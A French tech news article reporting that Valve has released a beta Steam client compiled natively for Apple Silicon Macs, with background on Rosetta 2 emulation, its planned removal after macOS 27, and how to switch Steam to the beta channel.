☕️ Steam a enfin une version native pour les Mac Apple Silicon

Si vous jouez sur Mac, vous avez peut-être Steam. Et si vous l’avez, vous savez que certains jeux peuvent fonctionner nativement sur les Mac munis de puces Apple Silicon (M1 à M4), mais que le client Steam lui-même est épouvantable.

Déjà à l’époque de la puce M1, quand nous avions publié un retour d’expérience d’un an sur un MacBook Pro M1, nous avions souligné l’évolution notable du parc logiciel. La suite Office de Microsoft, par exemple, avait été prête dès le départ, alors que Teams avait dû attendre plus de deux ans. D’autres applications, comme Discord, avaient également pris un peu leur temps. Et dans ces applications non compatibles, Steam remportait la palme de l’utilisation la plus éprouvante.

Il existe en effet une différence conséquente de performances entre une application native, compilée pour l’architecture arm64, et une application d’ancienne génération, compilée pour x86_64, à la grande époque des Mac Intel. Quand une telle application est exécutée sur une machine Apple Silicon, Rosetta 2 est appelé à la rescousse. Cette couche d’émulation donne de bons résultats, mais le lancement des applications reste lent, voire très lent.

Or, Apple a annoncé en marge de sa WWDC que Rosetta 2 serait présent dans le futur macOS 27, qui sera présenté l’année prochaine, mais plus dans macOS 28. Nous nous posions alors la question de ce qu’il adviendrait pour les applications non natives. Hasard ou non du calendrier, Valve vient de publier une nouvelle version bêta de son client Steam, compilée nativement pour l’architecture Apple Silicon.

La version bêta actuelle de Steam sur macOS

Si vous basculez Steam en bêta (Paramètres > Interface) et que vous redémarrez l’application, une mise à jour va s’installer (environ 230 Mo). Au redémarrage de Steam, vous devriez constater que le client se charge beaucoup plus rapidement. L’application est en outre bien plus réactive, surtout dans des opérations simples comme le redimensionnement. Il n’y a en revanche aucune différence visuelle.

Valve ne s’est jamais vraiment expliquée sur le retard de cette version, quand la quasi-totalité du parc logiciel s’était déjà adapté. On peut supposer que l’entreprise n’accorde pas une très grande importance au parc Mac. Rappelons quand même que si Valve n’avait pas touché au client lui-même, l’entreprise avait assez rapidement proposé une mise à jour des composants afin que les jeux compilés nativement pour Apple Silicon soient pris en charge.

  •